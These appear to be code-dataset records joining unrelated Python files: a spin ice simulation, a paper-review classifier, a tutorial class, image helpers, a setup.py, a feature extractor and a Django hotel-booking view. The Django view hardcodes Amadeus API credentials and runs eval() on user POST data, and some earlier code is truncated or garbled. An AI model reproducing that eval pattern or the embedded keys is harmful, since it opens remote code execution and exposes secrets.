mu/4pi\n\n#============ASI intrinsic properties = Energy barrier distribution, Exchange bias==============================\nGaussian_distribution = np.random.normal(.70, 0.001, size=(M*N,))\nswitching_Barrier = np.reshape(Gaussian_distribution, (M, N))\nEbxy = np.multiply(switching_Barrier,abs(Sx+Sy))\nExy = np.zeros((M,N))\nEd, Ez, Ex, Eeb = np.zeros((M,N)), np.zeros((M,N)), np.zeros((M,N)), np.zeros((M,N))\n\nif (Exchange_Bias == 0):\n h_eb = 1.0 # Exchange bias magnitude\n dh_eb = 0.010 # Standard deviation\n phi_Heb = 180 # Angle in degrees\n dphi_Heb = 2 # Standard deviation in direction of exchange bias\n Exchange_Barrier = np.reshape(np.random.normal(h_eb,dh_eb, size=(M*N,)), (M, N))\n h_eb_arr = np.multiply(Exchange_Barrier,abs(Sx+Sy))\n Exchange_angle_arr = np.reshape(np.random.normal(math.radians(phi_Heb), math.radians(dphi_Heb), size=(M*N,)), (M, N))\n Hxy_eb_arr = np.stack([h_eb_arr*np.cos(Exchange_angle_arr),h_eb_arr*np.sin(Exchange_angle_arr)], axis=0)\nelse:\n Hxy_eb_arr = np.stack([0*Sx, 0*Sy], axis=0)\n\n#================ Initialize variables of the simulation =======================================================\nITERATION = [] # np.zeros(its) # iterations\navg_Mx = []#np.zeros(its) # X-sublattice Order parameter\navg_My = []#np.zeros(its) # Y-sublattice Order parameter\nVtype1 = []\nVtype2 = []\nVtype3 = []\nVtype4 = []\nVtype10, Vtype11, Vtype20, Vtype21, Vtype22, Vtype23, Vtype30, Vtype31, Vtype32, Vtype33, Vtype34, Vtype35, Vtype36, Vtype37, Vtype40, Vtype41 = [],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]\n\n\n\nj=0 #iteration number\nITERATION.append(0)\n\n#======= Counting vertices ====================================================\nVertex = np.argwhere(S == 0)#[0]\nCl,Cr,Ct,Cd = 0,0,0,0\nV = np.zeros((M,N))\nVb = np.zeros((M,N))\nV1 = np.zeros((M,N))\nE1=0\nfor ze in Vertex:\n xi = ze[1]\n yi = ze[0]\n if (10:\n Exy[yi,xi], Ed[yi,xi], Ez[yi,xi], Ex[yi,xi], Eeb[yi,xi] = asi_energy(xi,yi,Sxy,M,N,H,C,dipolar_switch,exchange_switch,Exchange_Bias, Hxy_eb_arr) \n# (Exy[yi,xi], Ed[yi,xi], Ez[yi,xi], Ex[yi,xi], Eeb[yi,xi]) = asi_energy(i,j,Sxy,M,N,H,C,dipolar_switch,exchange_switch, Exchange_Bias, Hxy_eb_arr)\n # p = random.uniform(0, 1) \n if (Exy[yi,xi] >= 1*Ebxy[yi,xi]):# and np.exp((E)*b) > p): # dE = 2Ee Energy difference\n Sxy[:,yi,xi] = -1*Sxy[:,yi,xi]\n# else: # Thermal fluctuations\n# p = random.uniform(0, 1)\n# if(np.exp((E+E0)*b) > p): \n# Sxy[:,yi,xi] = -1*Sxy[:,yi,xi]\n if (Sxy[0,yi,xi] != 0): # x compoment\n if (02020):\n\tprint(\"ERROR : please provide a valid year in command line argument\")\n\texit()\n\nyear = str(year)\n\n\n#hyper-params\npaper_embed_dim = 768\nrev_embed_dim = 512\n \nbalance_factor = 1\n\nbatch_sz = 32 #keep it even\n \nlstm_base = 256\n\nnum_epochs = 20\nif len(sys.argv)>2:\n\tnum_epochs = int(sys.argv[2])\n \nhyper_factor_and_dropout = 0.7\ndropout = hyper_factor_and_dropout\n \nactivation_func = \"tanh\"\n\n\n\npaperEmbed = pd.read_csv(\"./DATA/data/EDATA\"+year+\".csv\")\npaperEmbed = paperEmbed[[\"col\"+str(i) for i in range(paper_embed_dim)]]\npaperEmbed = paperEmbed.values.tolist()\npaperEmbed = paperEmbed + [[0.0 for i in range(paper_embed_dim)]]\npaper_num_tokens = len(paperEmbed)\npaperMeta = pd.read_csv(\"./DATA/Dmeta\"+year+\".csv\")\npaperMeta = paperMeta[['paper-start' , 'paper-end']]\nscMeta = pd.read_csv(\"./DATA/PMETA\"+year+\"_SCSUMMA.csv\")\nscMeta = scMeta[['id' , 'section-start' , 'section-end']]\nprint(\"paper_num_tokens : \",paper_num_tokens)\n\n\nrevEmbed = pd.read_csv(\"./DATA/data/REV_USE\"+year+\".csv\")\nrevEmbed = revEmbed[[\"col\"+str(i) for i in range(rev_embed_dim)]]\nrevEmbed = revEmbed.values.tolist()\nrevEmbed = revEmbed + [[0.0 for i in range(rev_embed_dim)]]\nrev_num_tokens = len(revEmbed)\nrevMeta = pd.read_csv(\"./DATA/REV\"+year+\".csv\")\nrevMeta = revMeta[['rev-start' , 'rev-end']]\nabMeta = pd.read_csv(\"./DATA/AB\"+year+\".csv\")\nabMeta = abMeta[['id' , 'verdict', 'revMeta-start' , 'revMeta-end']]\nnum_samples = len(abMeta)\nprint(\"rev_num_tokens : \",rev_num_tokens)\n\n\nnum_samples = len(scMeta)\npids = []\nscid = {}\nfor i in range(num_samples):\n\tpids.append(str(scMeta['id'][i]))\n\tscid[str(scMeta['id'][i])] = i\npids.sort()\ndummy = []\nfor i in range(num_samples):\n\tj = scid[pids[i]]\n\tdummy.append([scMeta['id'][j] , scMeta['section-start'][j] , scMeta['section-end'][j]])\ndummy = pd.DataFrame(dummy)\ndummy.columns = ['id' , 'section-start' , 'section-end']\nscMeta = dummy\n\t\nprint(\"paperMeta-revise...\\n\")\nnum_samples = len(abMeta)\npaperId = {}\nfor i in range(num_samples):\n\tpaperId[abMeta['id'][i]] = i\n\ndummy = []\nnf = num_samples - len(scMeta)\nnum_samples = len(scMeta)\nfor i in range(num_samples):\n\tidx = paperId[scMeta['id'][i]]\n\tdummy.append([abMeta[\"id\"][idx], abMeta[\"verdict\"][idx] , abMeta[\"revMeta-start\"][idx] , abMeta[\"revMeta-end\"][idx]])\ndummy = pd.DataFrame(dummy)\ndummy.columns = ['id' , 'verdict' , 'revMeta-start' , 'revMeta-end']\n\nabMeta = dummy\nnum_samples = len(abMeta)\ndummy = []\n\nprint(\"number of samples : \",num_samples)\n\npaper_mx_sections = 0\npaper_mx_snts = 0\nrev_mx_snts = 0\nnum_samples = len(scMeta)\nfor i in range(num_samples):\n\tpaper_mx_sections = max(paper_mx_sections , scMeta['section-end'][i]-scMeta['section-start'][i])\n\tfor j in range(scMeta['section-start'][i] , scMeta['section-end'][i]):\n\t\tpaper_mx_snts = max(paper_mx_snts , paperMeta['paper-end'][j]-paperMeta['paper-start'][j])\n\tfor j in range(abMeta['revMeta-start'][i] , abMeta['revMeta-end'][i]):\n\t\trev_mx_snts = max(rev_mx_snts , revMeta['rev-end'][j]-revMeta['rev-start'][j])\nprint(\"max sections , paper max sentences , review max sentences : \",paper_mx_sections ,\" : \",paper_mx_snts , \" : \",rev_mx_snts)\n\nxall = [i for i in range(num_samples)]\nyall = [float(abMeta['verdict'][i]) for i in range(num_samples)]\nxtr , xte , ytr , yte = train_test_split(xall,yall, test_size=0.25, random_state=seed, stratify=yall)\nteLen = len(yte)\ntrLen = len(ytr)\n\npaperTest = []\nrevTest = []\nYtest = []\nzeroSection = [(paper_num_tokens-1) for i in range(paper_mx_snts)]\n\nfor i in xte:\n\tpaperDummy = []\n\tfor j in range(scMeta['section-start'][i] , scMeta['section-end'][i]):\n\t\tdummy = []\n\t\tfor k in range(paperMeta['paper-start'][j] , paperMeta['paper-end'][j]):\n\t\t\tdummy.append(k)\n\t\ttimes = paper_mx_snts - (paperMeta['paper-end'][j] - paperMeta['paper-start'][j])\n\t\tfor t in range(times):\n\t\t\tdummy.append(paper_num_tokens-1)\n\t\tpaperDummy.append(dummy)\n\ttimes = paper_mx_sections - (scMeta['section-end'][i] - scMeta['section-start'][i])\n\tfor t in range(times):\n\t\tpaperDummy.append(zeroSection)\n\tpaperTest.append(paperDummy)\n\trevDummy = []\n\tfor j in range(abMeta['revMeta-start'][i] , abMeta['revMeta-end'][i]):\n\t\tdummy = []\n\t\tfor k in range(revMeta['rev-start'][j] , revMeta['rev-end'][j]):\n\t\t\tdummy.append(k)\n\t\ttimes = rev_mx_snts - (revMeta['rev-end'][j] - revMeta['rev-start'][j])\n\t\tfor t in range(times):\n\t\t\tdummy.append(rev_num_tokens-1)\n\t\trevDummy.append(dummy)\n\trevTest.append(revDummy)\n\nYtest = yte\nprint(\"Test-set length : \",teLen , \" : \",len(paperTest) , \" : \",len(revTest) , \" : \", len(Ytest))\n\n\ncnt = [[] , []]\nfor i in range(trLen):\n\tcnt[int(ytr[i])].append(xtr[i])\nprint(len(cnt[0]) , \" : \",len(cnt[1]))\nxtr = []\nytr = []\nflag = [0 , 0]\ntmp = [0 , 0]\nwhile (flag[0]tmp[i][0]:\n\t\t\typ=1\n\t\tif Ytest[i][1]>Ytest[i][0]:\n\t\t\tyt=1\n\t\tmat[yt][yp] += 1\n\t#\n\tprec = [mat[0][0]/max(1,mat[0][0]+mat[1][0]) , mat[1][1]/max(1,mat[1][1],mat[0][1])]\n\trec = [mat[0][0]/max(1,mat[0][0]+mat[0][1]) , mat[1][1]/max(1,mat[1][1]+mat[1][0])]\n\tf1 = [(2*prec[0]*rec[0])/max(0.001,prec[0]+rec[0]) , (2*prec[1]*rec[1])/max(0.001,prec[1]+rec[1])]\n\t#\n\tval = (mat[0][0]+mat[1][1])/teLen\n\t#\n\tif val>compare_val:\n\t\ty_predict = deepcopy(tmp)\n\t\tlos,acc = model.evaluate([paperTest , revTest] , Ytest, batch_size=batch_sz , verbose=0)\n\t\tcompare_val = val\n\nprint(\"test-set [ loss : \",los,\" , accuracy : \",acc,\" ]\")\n\nprint(\"confusion matrix..............\")\nyt = []\nyp = []\nmat = [[0,0],[0,0]]\nfor i in range(teLen):\n\tif y_predict[i][0]>=y_predict[i][1]:\n\t\typ.append(0)\n\telse:\n\t\typ.append(1)\n\tif Ytest[i][0]>=Ytest[i][1]:\n\t\tyt.append(0)\n\telse:\n\t\tyt.append(1)\n\tmat[yt[i]][yp[i]] += 1\nprint(\"confusion_matrix : \",mat)\nyp = np.asarray(yp).reshape(teLen)\nyt = np.asarray(yt).reshape(teLen)\nprint(metrics.classification_report(yt,yp))\n\ndef plot_conf_mat(cm , xlen, ylen , title=\"confusion matrix\", cmap = plt.cm.Blues):\n\tfig, ax = plot_confusion_matrix(conf_mat=cm, figsize=(2, 2) , cmap=cmap , colorbar=True , show_normed=True, show_absolute=False)\n\tplt.xlabel('Predicted Label', fontsize=10, labelpad=15)\n\tplt.ylabel('True Label', fontsize=10,labelpad=15)\n\tmarks = np.arange(2)\n\tlabel = [\"REJ\" , \"ACC\"]\n\tplt.xticks(marks, label)\n\tplt.yticks(marks, label)\n\tplt.title(title, fontsize=14 , pad=2)\n\tplt.show()\n\nconf_matrix = np.asarray(mat).reshape(2,2)\nplot_conf_mat(conf_matrix , 2, 2 , title=\"\")\n\n","sub_path":"model_PR.py","file_name":"model_PR.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"69832142","text":"class Dog:\n d_type = \"京巴\" #属性,类属性,类变量\n \n def sayhi(self): #方法,第一个参数必须是 self 代表实例本身\n print(\"Hello, my name is \",self.d_type)\n\n#实例化\nd = Dog() #生成了一个实例\nd2 = Dog() #可以生成多个实例\n\nd.sayhi() #实例,方法\nd2.sayhi()\n\nprint(d.d_type)\n\n","sub_path":"alex/类/类的基本语法.py","file_name":"类的基本语法.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"570095124","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 18 20:07:00 2019\n\n@author: Nataly\n\"\"\"\nimport numpy as np\ndef contraste(img):\n im11 = img\n #arreglo = np.array(im11.size)\n #print(im11.size)\n #total = arreglo[0] * arreglo[1]\n arreglo=im11.shape\n #arreglo=list(arreglo)\n total = arreglo[0] * arreglo[1]\n i = 0\n suma = 0\n while i < arreglo[0]:\n j = 0\n while j < arreglo[1]:\n suma = suma + im11[i, j]\n j+=1 \n i+=1\n brillo = suma / total \n i = 0\n while i < arreglo[0]:\n j = 0\n while j < arreglo[1]:\n aux = im11[i, j] - brillo\n suma = suma + aux\n j+=1\n i+=1\n cont = suma * suma\n cont = np.sqrt(suma / total)\n contraste = cont\n #print(\"El contraste de la imagen es: \", contraste)\n return contraste\n\ndef brillo(img):\n im10 = img\n arreglo = np.array(im10.size)\n total = arreglo[0] * arreglo[1]\n i = 0\n suma = 0\n while i < im10.size[0]:\n j = 0\n while j < im10.size[1]:\n suma = suma + im10.getpixel((i, j))\n j+=1 \n i+=1\n brillo = suma / total \n brillo = int(brillo)\n #print(\"El brillo de la imagen es: \", brillo)\n\n","sub_path":"subDM/brilloContraste.py","file_name":"brilloContraste.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"513901315","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nrequires = [\n 'pyramid',\n 'pyramid_mako',\n 'pyramid_debugtoolbar',\n 'pyramid_tm',\n 'SQLAlchemy',\n 'transaction',\n 'zope.sqlalchemy',\n 'waitress',\n]\n\ntests_require = [\n 'nose',\n 'mock'\n]\n\nmigrations_require = [\n 'alembic',\n]\n\nsetup(name='expenses',\n version='1.0.0',\n description='expenses',\n author='bruk habtu',\n author_email='bruk.habtu@beanfield.com',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n extras_require={\n 'testing': tests_require,\n 'migrations': migrations_require,\n },\n install_requires=requires,\n entry_points=\"\"\"\n [paste.app_factory]\n main = expenses:main\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190828781","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport re\nimport cv2\nimport pdb\nimport tensorflow as tf\nimport argparse\nfrom skimage.transform import resize\nimport sys\nsys.path.insert(0, \"/home/hxw/frameworks/models/research/object_detection\")\nfrom utils import visualization_utils as vis_util\nimport numpy as np\nimport PIL.Image as Image\nimport PIL.ImageDraw as ImageDraw\nimport PIL.ImageFont as ImageFont\nfrom itertools import compress\nimport os.path\n\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT_CLS = 'model/market/frozen_graph.pb'\nNUM_CLASSES = 2\n\ndef get_boxes_from_image(image, boxes):\n image_data = []\n h, w, _ = image.shape\n for box in boxes:\n x1 = max(int(box[0]), 0)\n y1 = max(int(box[1]), 0)\n x2 = min(int(x1 + box[2]), w)\n y2 = min(int(y1 + box[3]), h)\n image_data.append(((resize(image[y1:y2, x1:x2, :], (299, 299), preserve_range=True).astype(np.float32))/255-0.5)/2)\n return image_data\n\n\ndef extract_features(exp, startf=0, endf=100000, vis=False, fps=40.0):\n video_file = \"result/original/\" + exp + \".mp4\"\n person_track_file = 'result/tracking/' + exp + '_person.txt'\n bin_track_file = 'result/tracking/' + exp + '_bin.txt'\n\n capture = cv2.VideoCapture(video_file)\n capture.set(1, startf)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n #out = cv2.VideoWriter('./result/tracking/' + exp + '_SORT_Tracking.avi', fourcc, fps, (1920, 1080))\n \n person_features_npy = './result/tracking/' + exp + '_features_person.npy'\n bin_features_npy = './result/tracking/' + exp + '_features_bin.npy'\n \n if os.path.isfile(person_track_file):\n person_boxes = np.loadtxt(person_track_file, delimiter=',')\n else:\n person_boxes = np.array([])\n\n if os.path.isfile(bin_track_file): \n bin_boxes = np.loadtxt(bin_track_file, delimiter=',')\n else:\n bin_boxes = np.array([])\n \n\n classification_graph = tf.Graph()\n with classification_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT_CLS, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n sess_cls = tf.Session(graph=classification_graph)\n\n i = startf - 1\n person_features = []\n bin_features = []\n\n while True:\n flag, frame = capture.read()\n if frame is not None:\n frame = frame[:,:,::-1]\n image = Image.fromarray(frame)\n i += 1\n else: break\n if i > endf: break\n \n if person_boxes.size > 0:\n curr_person_boxes = person_boxes[person_boxes[:,0] == i]\n else:\n curr_person_boxes = np.array([])\n if bin_boxes.size > 0: \n curr_bin_boxes = bin_boxes[bin_boxes[:,0] == i]\n else:\n curr_bin_boxes = np.array([]) \n\n if curr_person_boxes.size > 0:\n with classification_graph.as_default():\n image_data = get_boxes_from_image(np.squeeze(image), curr_person_boxes[:,2:])\n\n feature = classification_graph.get_tensor_by_name('InceptionV3/Logits/Dropout_1b/Identity:0')\n\n for sub_image, box in zip(image_data, curr_person_boxes[:,:2]):\n sub_image = sub_image[np.newaxis, :]\n curr_person_feature = sess_cls.run(feature,\n feed_dict={'Placeholder:0': sub_image})\n curr_person_feature = np.squeeze(curr_person_feature)\n person_features.append(np.concatenate([box.astype(np.float32), curr_person_feature]))\n\n if curr_bin_boxes.size > 0:\n with classification_graph.as_default():\n image_data = get_boxes_from_image(np.squeeze(image), curr_bin_boxes[:,2:])\n feature = classification_graph.get_tensor_by_name('InceptionV3/Logits/Dropout_1b/Identity:0')\n\n for sub_image, box in zip(image_data, curr_bin_boxes[:,:2]):\n sub_image = sub_image[np.newaxis, :]\n curr_bin_feature = sess_cls.run(feature,\n feed_dict={'Placeholder:0': sub_image})\n curr_bin_feature = np.squeeze(curr_bin_feature)\n bin_features.append(np.concatenate([box.astype(np.float32), curr_bin_feature]))\n \n print('%d frames processed!' % (i - startf + 1))\n\n\n np.save(person_features_npy, np.array(person_features))\n np.save(bin_features_npy, np.array(bin_features)) \n\ndef parse_args():\n \"\"\" Parse command line arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Extract features\")\n parser.add_argument(\n \"--exp\", help=\"Name of video file\",\n default=None, required=True)\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n extract_features(args.exp)\n \n","sub_path":"mycore/extract_track_features.py","file_name":"extract_track_features.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299182798","text":"# Create your views here.\n\nfrom amadeus import Client, ResponseError\nfrom django.shortcuts import render, redirect\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nfrom .models import Bookings\nimport requests\nfrom django.core.mail import send_mail\n\n# Create your views here.\namadeus = Client(\n client_id='itAu7wJi164TVE1xgGnQ1hDTnnL7jchA',\n client_secret='3LlE97fVMg7AaWqG',\n hostname='test'\n )\n\n\nourlist = []\n\n\ndef search(request):\n ourlist.clear()\n if request.method == \"POST\":\n citycode = request.POST.get('citycode', )\n checkindate = request.POST.get('checkindate', )\n checkoutdate = request.POST.get('checkoutdate', )\n\n # print(adults,children,rooms)\n destination = citycode.split()\n\n destination = destination[-1]\n\n try:\n # Get list of Hotels by city code\n hotels_by_city = amadeus.shopping.hotel_offers.get(cityCode=destination, checkInDate=checkindate,\n checkOutDate=checkoutdate)\n k = hotels_by_city.data\n # print('this is data' ,k)\n\n except ResponseError as error:\n print(error.description())\n\n else:\n hotelid = \"Not Availlable\"\n name = \"Not Availlable\"\n address = \"Not Availlable\"\n phone = \"Not Availlable\"\n fax = \"Not Availlable\"\n distancefromcenter = \"Not Availlable\"\n dunits = \"Not Availlable\"\n description = \"Not Availlable\"\n hrating = \"Not Availlable\"\n media = \"Not Availlable\"\n amenities = \"Not Availlable\"\n guests_adults = \"Not Availlable\"\n price_currency = \"Not Availlable\"\n price_total = \"Not Availlable\"\n cityname = \"Not Availlable\"\n\n for i in k:\n # print(i)\n hoteldata = i\n\n try:\n\n hotelid = hoteldata[\"hotel\"]['hotelId']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n name = hoteldata[\"hotel\"]['name']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n address = hoteldata[\"hotel\"]['address']['cityName']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n phone = hoteldata[\"hotel\"]['contact']['phone']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n fax = hoteldata[\"hotel\"]['contact']['fax']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n distancefromcenter = hoteldata[\"hotel\"]['hotelDistance']['distance']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n dunits = hoteldata[\"hotel\"]['hotelDistance']['distanceUnit']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = hoteldata[\"hotel\"]['description']['text']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n hrating = hoteldata[\"hotel\"]['rating']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = hoteldata[\"hotel\"]['media'][0]['uri']\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n amenities = hoteldata[\"hotel\"]['amenities']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests_adults = hoteldata['offers'][0]['guests']['adults']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_total = hoteldata['offers'][0]['price']['total']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cityname = hoteldata[\"hotel\"]['address']['cityName']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_currency = hoteldata['offers'][0]['price']['currency']\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price_total = price_total = hoteldata['offers'][0]['price']['total']\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n amenitylist = []\n for i in amenities:\n i = str(i)\n i = i.lower()\n amenity = i.replace(\"_\", \" \")\n\n amenitylist.append(amenity)\n\n rating = {\n 'comment': 'good'\n }\n\n if hrating == '1':\n rating['comment'] = 'basic'\n elif hrating == '2':\n\n rating['comment'] = 'Fair'\n\n\n elif hrating == '3':\n rating['comment'] = 'Good'\n\n elif hrating == '4':\n\n rating['comment'] = 'Very Good'\n\n elif hrating == '5':\n rating['comment'] = 'Excellent'\n\n rating = rating['comment']\n # totalresults = ourlist.count()\n\n # currency_conversion\n # try:\n # local_currency = 'USD'\n #\n #\n #\n # url = f'https://free.currconv.com/api/v7/convert?q=EUR_{local_currency}&compact=ultra&apiKey=43dd6947aec7594b4e71'\n # params = {\n #\n # }\n #\n # r = requests.post(url, params=params)\n #\n # print(r.status_code)\n # print(r.json())\n #\n # except:\n # pass\n\n context = {\n\n 'hotelid': hotelid,\n 'name': name,\n 'address': address,\n 'phone': phone,\n 'fax': fax,\n 'distancefromcenter': distancefromcenter,\n 'dunits': dunits,\n 'description': description,\n 'hrating': hrating,\n 'media': media,\n 'rating': rating,\n 'amenitylist': amenitylist,\n # 'totalresults': totalresults,\n 'guests_adults': guests_adults,\n 'price_currency': price_currency,\n 'price_total': price_total,\n 'cityname': cityname,\n\n }\n\n ourlist.append(context)\n\n ourcontextdict = {\n 'ourlist': ourlist\n\n }\n\n return render(request, 'searchres.html', ourcontextdict)\n\n\n else:\n return redirect('/')\n\n\nhoteldetailslist = []\nammenities = []\n\n\ndef hoteldetails(request, hotelid):\n hoteldetailslist.clear()\n ammenities.clear()\n\n try:\n # Get list of offers for a specific hotel\n hotel_offers = amadeus.shopping.hotel_offers_by_hotel.get(hotelId=hotelid)\n # print('this are hotel offers',hotel_offers.data)\n\n k = hotel_offers.data\n\n\n except ResponseError as error:\n raise error\n\n\n else:\n\n if k == None:\n contextdict2 = {\n\n }\n\n else:\n\n offers = \"Not Availlable\"\n ammenitiesraw = \"Not Availlable\"\n media = \"Not Availlable\"\n cityname = \"Not Availlable\"\n hotelname = \"Not Availlable\"\n line = \"Not Availlable\"\n latitude = \"Not Availlable\"\n longitude = \"Not Availlable\"\n\n try:\n\n offers = k.get('offers')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n longitude = k.get('hotel', ).get('longitude', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n for i in ammenitiesraw:\n i = i.replace('_', ' ')\n ammenities.append(i)\n # print(i)\n\n for offer in offers:\n offer_id = \"Not availlable\"\n checkindate = \"Not availlable\"\n checkoutdate = \"Not availlable\"\n roomtype = \"Not availlable\"\n roomcategory = \"Not availlable\"\n beds = \"Not availlable\"\n bedtype = \"Not availlable\"\n description = \"Not availlable\"\n currency = \"Not availlable\"\n price = \"Not availlable\"\n guests = \"Not availlable\"\n\n try:\n\n offer_id = offer.get('id', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkindate = offer.get('checkInDate', )\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkoutdate = offer.get('checkOutDate', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n roomtype = offer.get('room', ).get('type', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n roomcategory = offer.get('room', ).get('typeEstimated', ).get('category', ).replace('_', ' ')\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n beds = offer.get('room', ).get('typeEstimated', ).get('beds', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n bedtype = offer.get('room', ).get('typeEstimated', ).get('bedType', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = offer.get('room', ).get('description', ).get('text', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = offer.get('price', ).get('currency', )\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n price = offer.get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests = offer.get('guests', ).get('adults', )\n\n\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n context = {\n\n 'offer_id': offer_id,\n 'checkindate': checkindate,\n 'checkoutdate': checkoutdate,\n 'roomtype': roomtype,\n 'roomcategory': roomcategory,\n 'beds': beds,\n 'bedtype': bedtype,\n 'description': description,\n 'hotelid': hotelid,\n 'currency': currency,\n 'price': price,\n 'guests': guests,\n\n }\n\n hoteldetailslist.append(context)\n\n hoteldetails = k\n contextdict2 = {\n 'hoteldetailslist': hoteldetailslist,\n 'ammenities': ammenities,\n 'media': media,\n 'cityname': cityname,\n 'hotelname': hotelname,\n 'line': line,\n 'latitude': latitude,\n 'longitude': longitude,\n 'hoteldetails': hoteldetails,\n\n }\n\n return render(request, 'searchItem.html', contextdict2)\n\n\nhotelroom = []\n\n\ndef roomdetails(request, offer_id):\n if request.method == 'POST':\n hoteldetails = request.POST.get('hoteldetails')\n\n k = eval(hoteldetails)\n ammenitiesraw = \"Not Availlable\"\n media = \"Not Availlable\"\n cityname = \"Not Availlable\"\n hotelname = \"Not Availlable\"\n line = \"Not Availlable\"\n latitude = \"Not Availlable\"\n longitude = \"Not Availlable\"\n\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n longitude = k.get('hotel', ).get('longitude', )\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n # Confirm the availability of a specific offer\n offer_availability = amadeus.shopping.hotel_offer(offer_id).get()\n # print('this is offer availlability',offer_availability.data)\n k = offer_availability.data\n\n myconst = k\n\n except ResponseError as error:\n\n raise error\n\n else:\n\n offerid = \"Not availlable\"\n\n citycode = \"Not availlable\"\n countrycode = \"Not availlable\"\n availability = \"Not availlable\"\n roomtype = \"Not availlable\"\n roomcat = \"Not availlable\"\n bed = \"Not availlable\"\n bedtype = \"Not availlable\"\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n boardtype = \"Not availlable\"\n typeestimated = \"Not availlable\"\n description = \"Not availlable\"\n guests = \"Not availlable\"\n currency = \"Not availlable\"\n base = \"Not availlable\"\n total = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n paymenttype = \"Not availlable\"\n 